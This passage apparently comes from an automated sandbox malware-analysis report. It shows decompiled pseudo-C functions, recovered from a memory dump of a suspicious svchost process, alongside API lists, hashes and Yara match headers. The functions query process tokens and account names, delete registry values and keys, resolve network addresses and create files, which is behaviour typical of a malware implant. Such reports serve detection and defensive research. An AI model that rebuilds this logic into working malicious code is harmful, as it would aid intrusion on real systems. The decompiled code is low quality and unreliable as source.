                                                            				_v1112 = _t70;
                                                            				if (GetTokenInformation(??, ??, ??, ??, ??) != 0) goto 0xaf547986;
                                                            				if (GetLastError() != 0x7a) goto 0xaf547a34;
                                                            				E0000022B22BAF564404(_t70, _t78, _v1064, __rdx);
                                                            				if (_t70 == 0) goto 0xaf547a34;
                                                            				r9d = _v1080;
                                                            				_v1112 =  &_v1080;
                                                            				if (GetTokenInformation(??, ??, ??, ??, ??) == 0) goto 0xaf547a2c;
                                                            				_v1096 =  &_v1056;
                                                            				_v1104 =  &_v1076;
                                                            				_v1112 =  &_v536;
                                                            				if (LookupAccountSidW(??, ??, ??, ??, ??, ??, ??) == 0) goto 0xaf547a2c;
                                                            				_t75 =  &_v1048;
                                                            				_t51 =  *_t75 & 0x0000ffff;
                                                            				 *(_t95 -  &_v1048 + _t75) = _t51;
                                                            				if (_t51 != 0) goto 0xaf547a10;
                                                            				E0000022B22BAF564114(_t51, 1, _t59, _t70,  *_t70, _t97,  &_v1048);
                                                            				goto 0xaf547a36;
                                                            				E0000022B22BAF564114(_t51, 1, _t59, _t70,  *_t70, _t97,  &_v1048);
                                                            				return E0000022B22BAF55A7C0(_t51,  &(_t75[1]), _v24 ^ _t98 - 0x00000470);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Token$Information$AccountErrorLastLookupOpenProcess
                                                            • String ID:
                                                            • API String ID: 2790146286-0
                                                            • Opcode ID: 4af4b1cb74762c26bad3847e56215a2ccb257635a11370a1e329464f09f33fb6
                                                            • Instruction ID: 18b8702f8fffb8a38f5571ac88b08bb28e8ab8fe2453ed2c0d99bfc39d20b376
                                                            • Opcode Fuzzy Hash: 4af4b1cb74762c26bad3847e56215a2ccb257635a11370a1e329464f09f33fb6
                                                            • Instruction Fuzzy Hash: 59411F32218B8496EB618B92F44D7DBB7A1FB89B84F440425DA8D47B5AEF3EC505CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E0000022B22BAF5438E0(void* __rax, void* __rcx, void* __rdx, void* __r9, long long __r15, long long _a8, char _a16, intOrPtr _a24) {
                                                            				intOrPtr _v72;
                                                            				long long _v80;
                                                            				char _v88;
                                                            				long long _v104;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* _t39;
                                                            				void* _t40;
                                                            				void* _t47;
                                                            				void* _t49;
                                                            				long long _t66;
                                                            				void* _t67;
                                                            				long long _t72;
                                                            				intOrPtr* _t74;
                                                            				void* _t76;
                                                            				void* _t77;
                                                            
                                                            				_t47 = __rax;
                                                            				_t74 = __rdx + 1;
                                                            				_v80 = _t74;
                                                            				_t77 = __rdx;
                                                            				_v72 = 0;
                                                            				_t76 = __rcx;
                                                            				r9d = _t49 - 1;
                                                            				_t72 = __r9 + _t74;
                                                            				_v88 = _t72;
                                                            				if (_t72 - _t74 - 4 >= 0) goto 0xaf543929;
                                                            				_v72 = 1;
                                                            				r14d = 0;
                                                            				goto 0xaf543935;
                                                            				r14d =  *_t74;
                                                            				_v80 = _t74 + 4;
                                                            				E0000022B22BAF543530( &_v88);
                                                            				E0000022B22BAF543530( &_v88);
                                                            				_t67 = _t47;
                                                            				if (_v72 != 0) goto 0xaf543a23;
                                                            				_a8 = __r15;
                                                            				_a24 = _t49 + 4;
                                                            				LocalAlloc(??, ??);
                                                            				E0000022B22BAF562BA0(0x40, 0, _t39, _t40, _t47, _t77, _t66, _t67, _t49);
                                                            				_a16 = _t66;
                                                            				r9d = 0x102;
                                                            				_v104 =  &_a16;
                                                            				r8d = 0;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf5439dc;
                                                            				dil = RegDeleteValueW(??, ??) == 0;
                                                            				RegCloseKey(??);
                                                            				r8d = _a24;
                                                            				r9b = 0x3f;
                                                            				 *((intOrPtr*)(_t49 + _t47)) = 0;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t76 + 8)), _t47);
                                                            				LocalFree(??);
                                                            				if (_t47 == 0) goto 0xaf543a16;
                                                            				E0000022B22BAF55A7E4( &_a16, _t47);
                                                            				if (_t67 == 0) goto 0xaf543a23;
                                                            				return E0000022B22BAF55A7E4( &_a16, _t67);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseDeleteFreeOpenValue
                                                            • String ID:
                                                            • API String ID: 3540541088-0
                                                            • Opcode ID: f9ff6769ef9db7efda29f1e2a472c5ab63376ac8a941926aef815ab2caec0977
                                                            • Instruction ID: 4e3c37bff063d5a9af417026a109c5e3f219b6e24068c84c5b7ad2c4f40f0023
                                                            • Opcode Fuzzy Hash: f9ff6769ef9db7efda29f1e2a472c5ab63376ac8a941926aef815ab2caec0977
                                                            • Instruction Fuzzy Hash: 1E318F33724680A6EA32DF62F80D7DAB7A5F785F80F444011EE8A47B5ADF3AC4459B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E0000022B22BAF54FF80(void* __edx, long long __rbx, void* __rcx, signed short* __r8, void* _a32) {
                                                            				signed int _v32;
                                                            				char _v80;
                                                            				intOrPtr _v88;
                                                            				char _v224;
                                                            				char _v232;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* __rbp;
                                                            				void* _t35;
                                                            				intOrPtr _t38;
                                                            				signed short _t39;
                                                            				void* _t43;
                                                            				void* _t51;
                                                            				void* _t53;
                                                            				signed long long _t62;
                                                            				signed long long _t63;
                                                            				intOrPtr _t67;
                                                            				intOrPtr _t78;
                                                            				long long _t81;
                                                            				void* _t83;
                                                            				void* _t86;
                                                            				void* _t88;
                                                            				void* _t95;
                                                            
                                                            				_t95 = _t88;
                                                            				 *((long long*)(_t95 + 0x20)) = __rbx;
                                                            				_t62 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t63 = _t62 ^ _t88 - 0x000000f0;
                                                            				_v32 = _t63;
                                                            				 *((intOrPtr*)(_t95 - 0x50)) = 0x100;
                                                            				__r8[1] = _t63;
                                                            				__r8[5] = _t63;
                                                            				__r8[9] = _t63;
                                                            				__r8[0xd] = 0;
                                                            				 *(_t95 - 0x4c) = _t63;
                                                            				 *(_t95 - 0x44) = _t63;
                                                            				 *(_t95 - 0x3c) = _t63;
                                                            				 *(_t95 - 0x34) = _t63;
                                                            				 *(_t95 - 0x2c) = _t63;
                                                            				 *((intOrPtr*)(_t95 - 0x24)) = 0;
                                                            				_t15 = _t81 + 3; // 0x3
                                                            				r8d = _t15;
                                                            				 *(_t95 - 0x4c) =  *__r8 & 0x0000ffff;
                                                            				_v232 =  &_v224;
                                                            				 *((long long*)(_t95 - 0x58)) = _t81;
                                                            				_t35 = E0000022B22BAF550680( *__r8 & 0x0000ffff,  &_v232, __rcx, _t86);
                                                            				__imp__getaddrinfo(_t81, _t83, _t86);
                                                            				if (_v232 ==  &_v224) goto 0xaf550038;
                                                            				E0000022B22BAF564114(_t43, 0, _t53, __rbx, __rcx, __r8,  &_v80);
                                                            				if (_t35 == 0) goto 0xaf550048;
                                                            				__imp__#112();
                                                            				goto 0xaf5500ae;
                                                            				_t67 = _v88;
                                                            				_t78 = _t67;
                                                            				if (_t67 == 0) goto 0xaf550085;
                                                            				_t38 =  *((intOrPtr*)(_t78 + 4));
                                                            				if (_t38 == 2) goto 0xaf550070;
                                                            				if (_t38 == 0x17) goto 0xaf550070;
                                                            				if ( *((intOrPtr*)(_t78 + 0x28)) != 0) goto 0xaf550058;
                                                            				goto 0xaf550085;
                                                            				_t39 = E0000022B22BAF562BA0(_t35, 0, _t51, _t53, __r8,  *((intOrPtr*)( *((intOrPtr*)(_t78 + 0x28)) + 0x20)), _t81, __r8,  *((intOrPtr*)( *((intOrPtr*)(_t78 + 0x28)) + 0x10)));
                                                            				__imp__freeaddrinfo();
                                                            				if (1 == 0) goto 0xaf5500a1;
                                                            				__imp__#9();
                                                            				__r8[1] = _t39;
                                                            				goto 0xaf5500ac;
                                                            				__imp__#112();
                                                            				return E0000022B22BAF55A7C0(0x2af9,  &_v224, _v32 ^ _t88 - 0x000000f0);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$freeaddrinfogetaddrinfohtons
                                                            • String ID:
                                                            • API String ID: 1798125793-0
                                                            • Opcode ID: 8ad96b920becc08a0d1341f262c5587ed5e2219b8100b0c7fef9948baf7c5ed3
                                                            • Instruction ID: 5353e29b99af06212770af5e90cbb106684de8f35f0f38a04744d63c2d231038
                                                            • Opcode Fuzzy Hash: 8ad96b920becc08a0d1341f262c5587ed5e2219b8100b0c7fef9948baf7c5ed3
                                                            • Instruction Fuzzy Hash: 4C415D73215B81A6EBB18F91E44C3AE73E5FB88780F458536CA8D4775ADF3AC8588700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 26%
                                                            			E0000022B22BAF535900(void* __edx, void* __rax, void* __rcx, void* __rdx, long long __rsi, signed int __r9, intOrPtr _a8, long long _a16) {
                                                            				long long _v40;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v56;
                                                            				void* __rbx;
                                                            				void* __rdi;
                                                            				intOrPtr _t26;
                                                            				void* _t27;
                                                            				long long _t36;
                                                            				long long _t37;
                                                            				void* _t41;
                                                            				signed long long _t43;
                                                            
                                                            				_t37 = __rsi;
                                                            				_a8 = 0;
                                                            				_t27 = __rdx;
                                                            				if (__rcx + 0x30 == __rdx) goto 0xaf535929;
                                                            				_t43 = __r9 | 0xffffffff;
                                                            				r8d = 0;
                                                            				E0000022B22BAF533E10(__rdx, __rcx + 0x30, __rdx, _t36, __rsi, _t41, _t43);
                                                            				_t26 =  *((intOrPtr*)(_t27 + 0x18));
                                                            				if (_t26 - 8 < 0) goto 0xaf53593c;
                                                            				goto 0xaf53593f;
                                                            				_a16 = _t37;
                                                            				if ( *((short*)(_t27 +  *(_t27 + 0x10) * 2 - 2)) == 0x5c) goto 0xaf5359b2;
                                                            				if (_t26 - 8 < 0) goto 0xaf535957;
                                                            				goto 0xaf53595a;
                                                            				r9d = 0;
                                                            				_v40 = _t36;
                                                            				_v48 = 0x80;
                                                            				_v56 = 3;
                                                            				_t11 = _t43 + 1; // 0x1
                                                            				r8d = _t11;
                                                            				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                                            				if (_t26 != 0xffffffff) goto 0xaf535999;
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                            • String ID:
                                                            • API String ID: 1503672127-0
                                                            • Opcode ID: 62cf78fbbf138343ebf604fa2ca74deba77003b1a75d362bc1b651a81a33c61c
                                                            • Instruction ID: 594f128c653809d244b4bb1e9b4f2d8b00f6124df376315ea64ded6a212db64d
                                                            • Opcode Fuzzy Hash: 62cf78fbbf138343ebf604fa2ca74deba77003b1a75d362bc1b651a81a33c61c
                                                            • Instruction Fuzzy Hash: C6319E7371064092EB219F6AE42C39A77A1F785FA4F448621DB6A077D9CF39C455C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 31%
                                                            			E0000022B22BAF543B90(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long __r12, long long __r14, long long _a8, char _a16, long long _a24, long long _a32) {
                                                            				intOrPtr _v56;
                                                            				long long _v64;
                                                            				char _v72;
                                                            				long long _v88;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				long _t27;
                                                            				void* _t36;
                                                            				void* _t39;
                                                            				void* _t45;
                                                            				long long _t63;
                                                            				void* _t64;
                                                            				long long _t71;
                                                            				long long _t73;
                                                            				void* _t77;
                                                            				void* _t81;
                                                            
                                                            				_t45 = __rax;
                                                            				_a32 = __rbx;
                                                            				_t73 = __rdx + 1;
                                                            				_v64 = _t73;
                                                            				_t81 = __rdx;
                                                            				_v56 = 0;
                                                            				_t77 = __rcx;
                                                            				r9d = __rbx - 1;
                                                            				_t71 = __r9 + _t73;
                                                            				_v72 = _t71;
                                                            				if (_t71 - _t73 - 4 >= 0) goto 0xaf543bd9;
                                                            				_v56 = 1;
                                                            				goto 0xaf543be5;
                                                            				_v64 = _t73 + 4;
                                                            				E0000022B22BAF543530( &_v72);
                                                            				_t64 = _t45;
                                                            				if (_v56 != 0) goto 0xaf543cc2;
                                                            				_a8 = __r12;
                                                            				r12d = __rbx + 4;
                                                            				_a24 = __r14;
                                                            				LocalAlloc(??, ??);
                                                            				E0000022B22BAF562BA0(0x40, 0, _t36, _t39, _t45, _t81, _t63, _t64, __rbx);
                                                            				_a16 = _t63;
                                                            				r9d = 0x20106;
                                                            				_v88 =  &_a16;
                                                            				r8d = 0;
                                                            				_t27 = RegOpenKeyExW(??, ??, ??, ??, ??);
                                                            				if (_t27 != 0) goto 0xaf543c86;
                                                            				__imp__SHDeleteKeyW();
                                                            				dil = _t27 == 0;
                                                            				RegCloseKey(??);
                                                            				 *((intOrPtr*)(__rbx + _t45)) = 0;
                                                            				r9b = 0x3f;
                                                            				r8d = r12d;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t77 + 8)), _t45);
                                                            				LocalFree(??);
                                                            				if (_t64 == 0) goto 0xaf543cc2;
                                                            				return E0000022B22BAF55A7E4( &_a16, _t64);
			}

Instruction addresses: 0x22baf543b90 0x22baf543b90 0x22baf543ba0 0x22baf543ba9 0x22baf543bae 0x22baf543bb1 0x22baf543bb5 0x22baf543bb8 0x22baf543bbc 0x22baf543bbf 0x22baf543bcb 0x22baf543bcd 0x22baf543bd7 0x22baf543be0 0x22baf543bea 0x22baf543bef 0x22baf543bf6 0x22baf543bfc 0x22baf543c09 0x22baf543c0d 0x22baf543c18 0x22baf543c2a 0x22baf543c37 0x22baf543c3f 0x22baf543c45 0x22baf543c4a 0x22baf543c53 0x22baf543c5b 0x22baf543c6c 0x22baf543c7c 0x22baf543c80 0x22baf543c86 0x22baf543c8a 0x22baf543c91 0x22baf543c97 0x22baf543c9f 0x22baf543cb8 0x22baf543cd5

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseDeleteFreeOpen
                                                            • String ID:
                                                            • API String ID: 3791902735-0
                                                            • Opcode ID: f1d3b093f03b8f0b943f8899a24815629bd0c4f1e6b571d775afd163075c2228
                                                            • Instruction ID: 89ad0e8595374dda59f7569824916a935a157cb20ed676d4fec7671267c0897c
                                                            • Opcode Fuzzy Hash: f1d3b093f03b8f0b943f8899a24815629bd0c4f1e6b571d775afd163075c2228
                                                            • Instruction Fuzzy Hash: EE317E336146D0A2EB31DF52E80C79AB7A5F784B84F408015EE8A47B5ADF3AC559DB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: htons$AddressString
                                                            • String ID:
                                                            • API String ID: 2368566317-0
                                                            • Opcode ID: 9e233e38c0b9bf495a3f2b3d851d5047f6c6fbdbaee85d1634498a1f6c06f5a4
                                                            • Instruction ID: f434f794c306d55e531585c9d4a29f9648fcc00a7912dd84d78409c6c8c38ed5
                                                            • Opcode Fuzzy Hash: 9e233e38c0b9bf495a3f2b3d851d5047f6c6fbdbaee85d1634498a1f6c06f5a4
                                                            • Instruction Fuzzy Hash: 3F31B137204B51A2EB368F55A84C3ADB3B1F794B81F588421DE895779ADF7EC8528340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 27%
                                                            			E0000022B22BAF544830(intOrPtr __edx, long long __rbx, long long __rcx, long long _a8) {
                                                            				long long _v16;
                                                            				char _v24;
                                                            				long long _v32;
                                                            				char _v40;
                                                            				long long _v48;
                                                            				intOrPtr _v56;
                                                            				int _t39;
                                                            				intOrPtr _t40;
                                                            				long long _t63;
                                                            				intOrPtr* _t72;
                                                            				long long _t76;
                                                            				void* _t77;
                                                            
                                                            				_t66 = __rbx;
                                                            				_a8 = __rbx;
                                                            				_t40 = __edx;
                                                            				 *((char*)(__rcx + 0x18)) = 0;
                                                            				_t76 = __rcx;
                                                            				WaitForSingleObject(??, ??);
                                                            				CloseHandle(??);
                                                            				_t72 =  *((intOrPtr*)(__rcx + 0x148));
                                                            				if (_t72 == 0) goto 0xaf544870;
                                                            				_t63 =  *_t72;
                                                            				 *_t63();
                                                            				E0000022B22BAF55A7EC(_t63, _t72);
                                                            				if (__edx != 3) goto 0xaf544887;
                                                            				r8b = 1;
                                                            				goto 0xaf544899;
                                                            				if (__edx != 7) goto 0xaf544894;
                                                            				r8b = 1;
                                                            				goto 0xaf544899;
                                                            				r8d = 0;
                                                            				E0000022B22BAF545190(0x1d8, __edx, __edx - 7, __rbx, _t63, _t77);
                                                            				 *((long long*)(_t76 + 0x148)) = _t63;
                                                            				 *(_t63 + 8) =  *(_t76 + 0x24) & 0x000000ff;
                                                            				_t53 =  ==  ? 0xcc0020 : 0x40cc0020;
                                                            				r9d = 0;
                                                            				r8d = 0;
                                                            				_t15 =  ==  ? 0xcc0020 : 0x40cc0020;
                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x148)) + 0x14)) =  ==  ? 0xcc0020 : 0x40cc0020;
                                                            				 *((intOrPtr*)(_t76 + 0x2c)) = _t40;
                                                            				_v40 = E0000022B22BAF544D80;
                                                            				 *((char*)(_t76 + 0x18)) = 1;
                                                            				_v32 = _t76;
                                                            				_v24 = 1;
                                                            				CreateEventW(??, ??, ??, ??);
                                                            				_v16 = E0000022B22BAF544D80;
                                                            				_v48 = E0000022B22BAF544D80;
                                                            				_v56 = 0;
                                                            				E0000022B22BAF564DA4(0, 0, E0000022B22BAF544D80, _t66, _t63, _t77, 0xaf548af0,  &_v40);
                                                            				WaitForSingleObject(??, ??);
                                                            				_t39 = CloseHandle(??);
                                                            				 *((long long*)(_t76 + 0x30)) = E0000022B22BAF544D80;
                                                            				return _t39;
			}

Instruction addresses: 0x22baf544830 0x22baf544830 0x22baf54483a 0x22baf54483c 0x22baf544840 0x22baf54484a 0x22baf544854 0x22baf54485a 0x22baf544864 0x22baf544866 0x22baf54486e 0x22baf544875 0x22baf54487d 0x22baf54487f 0x22baf544885 0x22baf54488a 0x22baf54488c 0x22baf544892 0x22baf544894 0x22baf54489c 0x22baf5448aa 0x22baf5448b1 0x22baf5448bd 0x22baf5448c7 0x22baf5448ca 0x22baf5448cf 0x22baf5448cf 0x22baf5448d9 0x22baf5448de 0x22baf5448e3 0x22baf5448e7 0x22baf5448ec 0x22baf5448f1 0x22baf5448f7 0x22baf54490e 0x22baf544913 0x22baf544917 0x22baf544927 0x22baf544932 0x22baf544938 0x22baf544946

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandleObjectSingleWait$CreateEvent
                                                            • String ID:
                                                            • API String ID: 3556256739-0
                                                            • Opcode ID: 9602e55794e0dfdb957543a6eb7ea68636045d1d9e1d5116c6500b7e41b68299
                                                            • Instruction ID: 2ca875b1a11f12b2a5f4af9d8a5beea0b3ea0b846d38eecad6d8a3e30c40c4c7
                                                            • Opcode Fuzzy Hash: 9602e55794e0dfdb957543a6eb7ea68636045d1d9e1d5116c6500b7e41b68299
                                                            • Instruction Fuzzy Hash: AF31C133604B80A6EB65CF65E49C39E73A2F788B50F144125DB4E47B6ACF3AC460CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0000022B22BAF534033(signed char __ecx, signed long long __r14, long long _a32, long long* _a96, long long _a104, signed long long _a112, void* _a120) {
                                                            				void* _t20;
                                                            				signed char _t21;
                                                            				void* _t22;
                                                            				void* _t23;
                                                            				void* _t24;
                                                            				intOrPtr _t37;
                                                            				void* _t38;
                                                            				intOrPtr _t40;
                                                            				long long* _t43;
                                                            				long long _t47;
                                                            				void* _t48;
                                                            				long long _t52;
                                                            				long long _t54;
                                                            				signed long long _t63;
                                                            
                                                            				_t21 = __ecx;
                                                            				r14d = 0;
                                                            				_t43 = _a96;
                                                            				_t63 = _a112;
                                                            				_t52 = _a104;
                                                            				_t54 = _a32;
                                                            				if (_t63 == 0) goto 0xaf534079;
                                                            				if ( *((long long*)(_t43 + 0x18)) - 8 < 0) goto 0xaf534065;
                                                            				goto 0xaf534068;
                                                            				if (_t63 == 0) goto 0xaf534079;
                                                            				_t20 = E0000022B22BAF562BA0(__ecx, _t22, _t23, _t24, _t54, _t43, _t52, _t54, _t63 + _t63);
                                                            				_t37 =  *((intOrPtr*)(_t43 + 0x18));
                                                            				if (_t37 - 8 < 0) goto 0xaf5340dc;
                                                            				_t38 = _t37 + 1;
                                                            				_t47 =  *_t43;
                                                            				if (_t38 - 0xffffffff <= 0) goto 0xaf534094;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t38 + _t38 - 0x1000 < 0) goto 0xaf5340d7;
                                                            				if ((_t21 & 0x0000001f) == 0) goto 0xaf5340aa;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t40 =  *((intOrPtr*)(_t47 - 8));
                                                            				if (_t40 - _t47 < 0) goto 0xaf5340b9;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t48 = _t47 - _t40;
                                                            				if (_t48 - 8 >= 0) goto 0xaf5340c8;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t48 - 0x27 <= 0) goto 0xaf5340d4;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				0xaf55a85c();
                                                            				 *((long long*)(_t43 + 0x18)) = 7;
                                                            				 *(_t43 + 0x10) = __r14;
                                                            				if ( *((long long*)(_t43 + 0x18)) - 8 < 0) goto 0xaf5340f4;
                                                            				goto 0xaf5340f7;
                                                            				 *_t43 = r14w;
                                                            				 *_t43 = _t54;
                                                            				 *((long long*)(_t43 + 0x18)) = _t52;
                                                            				 *(_t43 + 0x10) = _t63;
                                                            				if ( *((long long*)(_t43 + 0x18)) - 8 < 0) goto 0xaf534110;
                                                            				 *((intOrPtr*)(_t54 + _t63 * 2)) = r14w;
                                                            				return _t20;
			}

Instruction addresses: 0x22baf534033 0x22baf534033 0x22baf534040 0x22baf534045 0x22baf53404a 0x22baf53404f 0x22baf534057 0x22baf53405e 0x22baf534063 0x22baf53406b 0x22baf534074 0x22baf534079 0x22baf534081 0x22baf534083 0x22baf534086 0x22baf53408c 0x22baf53408e 0x22baf534093 0x22baf53409d 0x22baf5340a2 0x22baf5340a4 0x22baf5340a9 0x22baf5340aa 0x22baf5340b1 0x22baf5340b3 0x22baf5340b8 0x22baf5340b9 0x22baf5340c0 0x22baf5340c2 0x22baf5340c7 0x22baf5340cc 0x22baf5340ce 0x22baf5340d3 0x22baf5340d7 0x22baf5340dc 0x22baf5340e4 0x22baf5340ed 0x22baf5340f2 0x22baf5340f7 0x22baf5340fb 0x22baf5340fe 0x22baf534102 0x22baf53410b 0x22baf534110 0x22baf534126

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: a55318281355751048e654ec6c90e4f60892887427f657d0e125a8b9e8dc6663
                                                            • Instruction ID: f7ee1c7b9edc606a944283dfc40b4e7a00407a5dfde883763964693ca61f07d0
                                                            • Opcode Fuzzy Hash: a55318281355751048e654ec6c90e4f60892887427f657d0e125a8b9e8dc6663
                                                            • Instruction Fuzzy Hash: 3A218E27314B4491EB7AAFE9D06D3DD3790E740B94F140B158B690B7DBCF3AC4A18281
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeavesend
                                                            • String ID:
                                                            • API String ID: 421069059-0
                                                            • Opcode ID: d810bfc3613e10ac28bb07b8fb333ee80c8520b6d9246e445967c01a5f6fe600
                                                            • Instruction ID: b414d6d6b24b274a8e302700bb12d785c0fbe6cdb38b607204e6c3c0f3fe20ee
                                                            • Opcode Fuzzy Hash: d810bfc3613e10ac28bb07b8fb333ee80c8520b6d9246e445967c01a5f6fe600
                                                            • Instruction Fuzzy Hash: A3316B33214A54ABE771CF6AE58C69E77B0F348B90F501515DB8A83F56DF3AE4A08B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E0000022B22BAF533A80(void* __edx, long long __rbx, intOrPtr* __rcx, long long __rsi, signed int __r8, long long _a8, long long _a16) {
                                                            				void* __rdi;
                                                            				void* _t17;
                                                            				void* _t19;
                                                            				void* _t20;
                                                            				void* _t21;
                                                            				void* _t34;
                                                            				intOrPtr _t36;
                                                            				intOrPtr* _t38;
                                                            				intOrPtr _t45;
                                                            				void* _t46;
                                                            
                                                            				_a8 = __rbx;
                                                            				_a16 = __rsi;
                                                            				_t38 = __rcx;
                                                            				if (__edx == 0) goto 0xaf533afd;
                                                            				if ( *((long long*)(__rcx + 0x18)) - 8 < 0) goto 0xaf533afd;
                                                            				_t45 =  *__rcx;
                                                            				if (__r8 == 0) goto 0xaf533ab3;
                                                            				E0000022B22BAF562BA0(_t17, _t19, _t20, _t21, __rcx, _t45, _t45, __r8, __r8 + __r8);
                                                            				_t34 =  *((intOrPtr*)(_t38 + 0x18)) + 1;
                                                            				if (_t34 - 0xffffffff > 0) goto 0xaf533b29;
                                                            				if (_t34 + _t34 - 0x1000 < 0) goto 0xaf533af5;
                                                            				if ((dil & 0x0000001f) != 0) goto 0xaf533b2f;
                                                            				_t36 =  *((intOrPtr*)(_t45 - 8));
                                                            				if (_t36 - _t45 >= 0) goto 0xaf533b35;
                                                            				_t46 = _t45 - _t36;
                                                            				if (_t46 - 8 < 0) goto 0xaf533b3b;
                                                            				if (_t46 - 0x27 > 0) goto 0xaf533b41;
                                                            				0xaf55a85c();
                                                            				 *((long long*)(_t38 + 0x18)) = 7;
                                                            				 *((long long*)(_t38 + 0x10)) = __r8;
                                                            				if ( *((long long*)(_t38 + 0x18)) - 8 < 0) goto 0xaf533b13;
                                                            				 *((short*)( *_t38 + __r8 * 2)) = 0;
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 01b01b3f11007f69d318a6b4b511b8171e13481f50d852a07ce971f895833366
                                                            • Instruction ID: c905a28660ce264c4aa4c1c0cb88c0a070cd3d059e7d1a150d192b9b9ea2b8f2
                                                            • Opcode Fuzzy Hash: 01b01b3f11007f69d318a6b4b511b8171e13481f50d852a07ce971f895833366
                                                            • Instruction Fuzzy Hash: 1C11D02371034861FA7AABE9D1AE3DD3351E704BE0F281B109AA903BCBDF76C4904381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

